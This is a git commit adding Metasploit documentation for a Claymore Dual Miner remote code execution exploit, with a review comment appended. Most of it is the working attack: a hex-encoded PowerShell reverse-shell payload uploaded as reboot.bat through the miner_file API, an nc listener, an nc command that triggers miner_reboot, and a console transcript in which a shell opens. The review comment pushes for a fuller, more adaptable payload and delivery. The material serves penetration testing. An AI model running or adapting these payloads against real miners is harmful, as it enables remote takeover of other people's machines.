Initial Claymore Dual Miner RCE doc commit

GSoC/Meterpreter_Web_Console
ReverseBrain 2018-07-02 16:02:36 +02:00
parent 54c2bc36e9
commit 43d71cdc09
1 changed file with 48 additions and 0 deletions

@ -0,0 +1,48 @@
## Description
This module connects to the Claymore Dual Miner API server to exploit the RCE.
This module can target the remote system if the miner is running with read/write mode enabled.
## Vulnerable Application
[Claymore Dual Miner](https://github.com/nanopool/Claymore-Dual-Miner) allows an user to control the miner
configuration by uploading files inside its directory using the server API. Since there is no check on file names, an attacker
can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and execute it via Remote Manager GUI.
## Verification Steps
1. Start the vulnerable software: `EthDcrMiner64.exe -epool eth-eu1.nanopool.org:9999 -ewal 0x83718eb67761Cf59E116B92A8F5B6CFE28A186E2 -epsw x -mode 1 -ftime 10 -mport 3333`
2. Run on terminal: `{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat", "706f7765727368656c6c2e657865202d436f6d6d616e64202224636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e536f636b6574732e544350436c69656e7428273132372e302e302e31272c31323334293b2473747265616d203d2024636c69656e742e47657453747265616d28293b5b627974655b5d5d246279746573203d20302e2e36353533357c257b307d3b7768696c6528282469203d202473747265616d2e52656164282462797465732c20302c202462797465732e4c656e6774682929202d6e652030297b3b2464617461203d20284e65772d4f626a656374202d547970654e616d652053797374656d2e546578742e4153434949456e636f64696e67292e476574537472696e67282462797465732c302c202469293b2473656e646261636b203d202869657820246461746120323e2631207c204f75742d537472696e6720293b2473656e646261636b3220203d202473656e646261636b202b202750532027202b2028707764292e50617468202b20273e20273b2473656e6462797465203d20285b746578742e656e636f64696e675d3a3a4153434949292e4765744279746573282473656e646261636b32293b2473747265616d2e5772697465282473656e64627974652c302c2473656e64627974652e4c656e677468293b2473747265616d2e466c75736828297d3b24636c69656e742e436c6f7365282922"]}`
3. Run on terminal: `nc -lvp 1234`
4. Run on terminal: `echo -e '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}\n' | nc 127.0.0.1 3333 && echo`
5. You should get a shell
## Options
**RHOST**
Remote Host
**RPORT**
Remote port the vulnerable software is running at, default is 3333.
### Remote target
```
msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234
lport => 1234
msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit
[*] Started reverse TCP handler on 127.0.0.1:1234
[*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000
whoami
reversebrain
```
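Review bot: verification step 2 gives only the bare `miner_file` JSON with no command to deliver it, while step 4 shows the complete `echo -e '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}\n' | nc 127.0.0.1 3333` pipeline; write the upload step the same way so a tester can reproduce it, and state that the `nc -lvp 1234` listener in step 3 must be up before step 4 fires `miner_reboot`, or move the listener ahead of the upload. The second element of `params` is an opaque hex string; the doc should say it is the hex-encoded content of `reboot.bat` and that it decodes to a `powershell.exe -Command ...` reverse shell back to 127.0.0.1:1234 (the same address as the listener), otherwise a reader cannot adapt the step to another host or port. The description says the target is exploitable only when the miner runs in read/write mode, but step 1 never says which part of the `EthDcrMiner64.exe` command line (presumably `-mport 3333`) selects that mode; name the option so testers can tell a vulnerable configuration from one that is not. In the Options section, `LHOST` and `LPORT` are set in the console transcript but are not documented alongside `RHOST` and `RPORT`. Minor: the prompt on the `set lport 1234` line reads `claymore_dual_miner_remote_manager_rcee` instead of `..._rce`, "an user" should be "a user", and "exploit the RCE" in the description would be clearer as "write an arbitrary file via `miner_file` and execute it via `miner_reboot`", since that is the chain the verification steps actually perform.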